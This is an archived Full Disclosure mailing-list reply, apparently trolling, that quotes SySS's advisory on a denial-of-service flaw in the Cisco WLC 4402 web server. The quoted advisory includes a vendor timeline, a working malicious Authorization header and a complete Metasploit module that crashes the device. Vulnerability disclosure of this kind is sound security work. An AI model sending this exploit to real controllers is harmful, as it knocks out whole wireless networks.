Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Cisco WLC 4402 Denial-of-Service vulnerability
From: antisecav () hushmail com
Date: Sun, 26 Jul 2009 18:27:24 -0500

that was a crappy disclosure. 

where is the .exe file with the gui?

at least make it in visual basic so i can have an interface

just send it to me in a zip


then itll be useful to the intelligence community


n3td3v / antisec

On Sun, 26 Jul 2009 09:17:52 -0500 SySS security advisories -- 
Christoph Bott <advisories () bott syss de> wrote:
=======================================
Vulnerable Product: Cisco WLC 4402 (most likely among many others)
Vulnerability discovered: January 2009
Reported to vendor: Jan 01, 2009
Fix available: not yet
=======================================


TIMELINE:
---------------------------------------------------
+ 01/11/2009: discovered vulnerability on a customer's site

+ 01/13/2009: initial vendor contact via psirt () cisco com

+ 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631

+ 02/09/2009: vendor states, that bugfix is _not_ contained within
cisco-sa-20090204-wlc

+ 03/30/2009: vendor states: "We have a fix  for this issue. 
However,
due to some other issues we are investigating we may not make this
public until about 42 days."

+ 06/02/2009: vendor states: "I really apologize for the delay on
publishing this advisory. The reason that we have not publish is 
because
we are also incorporating other security fixes within all the 
affected
releases. We WILL be publishing the advisory on July 8th, 2009 at 
1600 UTC."

+ 07/24/2009: Customer agreed with full disclosure

+ 07/26/2009: Still no fixes available; full disclosure due to 
lacking
vendor activities.



PRODUCT:
---------------------------------------------------
The Cisco WLC 4402 is a Wireless LAN Controller, which is 
manageable via
an integrated embedded webserver (emweb httpd).



AFFECTED VERSIONS:
---------------------------------------------------
The vulnerability described below could have been verified on WLC 
4402,
software release 5.1.151.0. However, since the vulnerability 
affects the
integrated embedded emweb http daemon, several other products 
and/or
software releases might be affected, too.



VULNERABILITY:
---------------------------------------------------
Using long, random authentication data, the embedded web server 
can be
crashed, which leeds to a device reboot. Subsequently repeated 
requests
lead to a permanent denial of service of the WLC (and therefore of 
the
whole wireless infrastructure).



EXPLOIT:
---------------------------------------------------
Not needed.

One only has to call
"/screens/frameset.html"
and provide Basic Authentication data which uses
a username and password longer than 63 characters each.

The following header worked for me:
Authorization: Basic
MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTA
xMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NT
Y3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0


The following code snippet can be used as a module within the 
metasploit
framework:

---- snip -----
require 'msf/core'


class Metasploit3 < Msf::Auxiliary

       include Msf::Exploit::Remote::Tcp
       include Msf::Auxiliary::Dos

       def initialize(info = {})
               super(update_info(info,
                       'Name'           => 'Cisco WLC 4200 Basic 
Auth
Denial of Service',
                       'Description'    => %q{

                               This module triggers a Denial of 
Service
condition in the Cisco WLC 4200
                               HTTP server. By sending a GET 
request
with long authentication data, the
                               device becomes unresponsive and 
reboots.
Firmware is reportedly vulnerable.
                       },
                       'Author'                => [ 'Christoph 
Bott
<msf[at]bott.syss.de>' ],
                       'License'        => MSF_LICENSE,
                       'Version'        => '$Revision: 5949 $',
                       'References'     =>
                               [
                                       [ 'BID', '???'],
                                       [ 'CVE', '???'],
                                       [ 'URL',
'http://www.cisco.com/?????&apos;],
                               ],
                       'DisclosureDate' => 'January 26 2009'))

               register_options(
                       [
                               Opt::RPORT(80),
                       ], self.class)

       end

       def run
               connect

               print_status("Sending HTTP DoS packet")

               sploit =
                       "GET /screens/frameset.html HTTP/1.0\r\n" 
+
                       "Authorization: Basic
MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTA
xMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NT
Y3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"

               sock.put(sploit + "\r\n")

               disconnect
       end

end

---- snip ----





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]